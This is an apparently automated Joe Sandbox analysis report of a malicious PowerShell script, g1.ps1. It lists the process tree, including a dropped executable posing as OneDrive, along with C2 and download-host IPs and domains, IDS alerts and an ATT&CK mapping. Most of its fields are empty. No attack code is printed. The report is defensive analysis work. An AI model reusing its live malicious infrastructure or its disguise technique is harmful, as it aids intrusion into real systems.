Windows
Analysis Report
g1.ps1
Overview
General Information
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- powershell.exe (PID: 5324 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\g1. ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4844 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Onedrive.exe (PID: 5036 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\Onedri ve.exe" MD5: 32C31F06E0B68F349F68AFDD08E45F3D)
- cleanup
System Summary |
---|
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-19T13:36:22.689457+0100 | 2056539 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 47.84.196.148 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2024-12-19T13:36:16.330798+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49706 | 89.35.237.170 | 80 | TCP |
2024-12-19T13:36:18.473200+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49707 | 89.35.237.170 | 443 | TCP |
Click to jump to signature section
AV Detection |
---|
Source: | Integrated Neural Analysis Model: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Code function: | 3_2_00007FF8A0327470 |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | Suricata IDS: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: | ||
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
System Summary |
---|
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Code function: | 3_3_0000021BD8F80020 | |
Source: | Code function: | 3_2_00007FF8A0301010 | |
Source: | Code function: | 3_2_00007FF8A0301960 |
Source: | Code function: | 3_3_0000021BD8F8876F | |
Source: | Code function: | 3_3_0000021BD8F8A71A | |
Source: | Code function: | 3_3_0000021BD8F958AF | |
Source: | Code function: | 3_3_0000021BD8F80BDF | |
Source: | Code function: | 3_3_0000021BD8F8C13F | |
Source: | Code function: | 3_3_0000021BD8F9764F | |
Source: | Code function: | 3_2_00007FF6104F1384 | |
Source: | Code function: | 3_2_00007FF6104FD98C | |
Source: | Code function: | 3_2_00007FF6104FC214 | |
Source: | Code function: | 3_2_00007FF6104F8E4C | |
Source: | Code function: | 3_2_00007FF6104F5E74 | |
Source: | Code function: | 3_2_00007FF6104F7B1C | |
Source: | Code function: | 3_2_00007FF6104FA33C | |
Source: | Code function: | 3_2_00007FF6104F7010 | |
Source: | Code function: | 3_2_00007FF6104F57D0 | |
Source: | Code function: | 3_2_00007FF6104FACA4 | |
Source: | Code function: | 3_2_00007FF6104F6454 | |
Source: | Code function: | 3_2_00007FF6104FE048 | |
Source: | Code function: | 3_2_00007FF6104F892C | |
Source: | Code function: | 3_2_00007FF6104F8CE0 | |
Source: | Code function: | 3_2_00007FF8A031B5A0 | |
Source: | Code function: | 3_2_00007FF8A0301010 | |
Source: | Code function: | 3_2_00007FF8A031A310 | |
Source: | Code function: | 3_2_00007FF8A03323A0 | |
Source: | Code function: | 3_2_00007FF8A031C6DE | |
Source: | Code function: | 3_2_00007FF8A031A8F0 | |
Source: | Code function: | 3_2_00007FF8A0301960 | |
Source: | Code function: | 3_2_00007FF8A031C980 | |
Source: | Code function: | 3_2_00007FF8A0302B00 | |
Source: | Code function: | 3_2_00007FF8A031BDC0 | |
Source: | Code function: | 3_2_00007FF8A031AD91 |
Source: | Dropped File: |
Source: | Classification label: |
Source: | Code function: | 3_2_00007FF6104F7B1C |
Source: | Code function: | 3_2_00007FF6104F4B14 |
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |
Source: | Static PE information: |
Source: | Code function: | 3_2_00007FF8A0301010 |
Source: | Static PE information: |
Source: | Code function: | 3_3_0000021BD8F92D0E | |
Source: | Code function: | 3_3_0000021BD8F98A92 | |
Source: | Code function: | 3_3_0000021BD8F851C8 |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | Registry key monitored for changes: | Jump to behavior | ||
Source: | Registry key monitored for changes: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | API coverage: |
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior | ||
Source: | Thread sleep count: | Jump to behavior | ||
Source: | Thread sleep time: | Jump to behavior |
Source: | Last function: | ||
Source: | Last function: |
Source: | Code function: | 3_2_00007FF8A0327470 |
Source: | Code function: | 3_2_00007FF8A031B9F0 |
Source: | Thread delayed: | Jump to behavior | ||
Source: | Thread delayed: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Source: | Process information queried: | Jump to behavior |
Source: | Code function: | 3_2_00007FF8A032D650 |
Source: | Code function: | 3_2_00007FF8A0301010 |
Source: | Code function: | 3_2_00007FF6104FD98C |
Source: | Process token adjusted: | Jump to behavior |
Source: | Code function: | 3_2_00007FF6104FEBD0 | |
Source: | Code function: | 3_2_00007FF6104FE8BC | |
Source: | Code function: | 3_2_00007FF8A0303190 | |
Source: | Code function: | 3_2_00007FF8A0302830 | |
Source: | Code function: | 3_2_00007FF8A031DC60 |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Thread register set: | Jump to behavior |
Source: | Process created: | Jump to behavior |
Source: | Code function: | 3_2_00007FF8A033E310 |
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior | ||
Source: | Queries volume information: | Jump to behavior |
Source: | Code function: | 3_2_00007FF6104FEDA4 |
Source: | Key value queried: | Jump to behavior |
Source: | Code function: | 3_2_00007FF6104F1F10 |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 111 Process Injection | 21 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 111 Process Injection | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 21 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 2 Obfuscated Files or Information | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Timestomp | LSA Secrets | 21 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 3 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 24 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
0% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs | |||
0% | ReversingLabs |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
bangla.b-cdn.net | 89.35.237.170 | true | false | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown | |
true |
| unknown | |
false |
| unknown | |
false |
| unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
89.35.237.170 | bangla.b-cdn.net | Romania | 34304 | TEENTELECOMRO | false | |
47.84.196.148 | unknown | United States | 3209 | VODANETInternationalIP-BackboneofVodafoneDE | true |
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1578250 |
Start date and time: | 2024-12-19 13:35:08 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 7m 32s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01 |
Number of analysed new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample name: | g1.ps1 |
Detection: | MAL |
Classification: | mal60.evad.winPS1@4/8@1/2 |
EGA Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
- Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
- Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
- Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
- Execution Graph export aborted for target powershell.exe, PID 5324 because it is empty
- Not all processes where analyzed, report is missing behavior information
- Report size getting too big, too many NtCreateKey calls found.
- Report size getting too big, too many NtOpenKeyEx calls found.
- Report size getting too big, too many NtQueryValueKey calls found.
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description |
---|---|---|
07:36:08 | API Interceptor | |
07:36:19 | API Interceptor |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
89.35.237.170 | Get hash | malicious | Unknown | Browse |
| |
47.84.196.148 | Get hash | malicious | Unknown | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
bangla.b-cdn.net | Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
TEENTELECOMRO | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | PureLog Stealer | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | CAPTCHA Scam ClickFix, LummaC Stealer | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
VODANETInternationalIP-BackboneofVodafoneDE | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
72a589da586844d7f0818ce684948eea | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
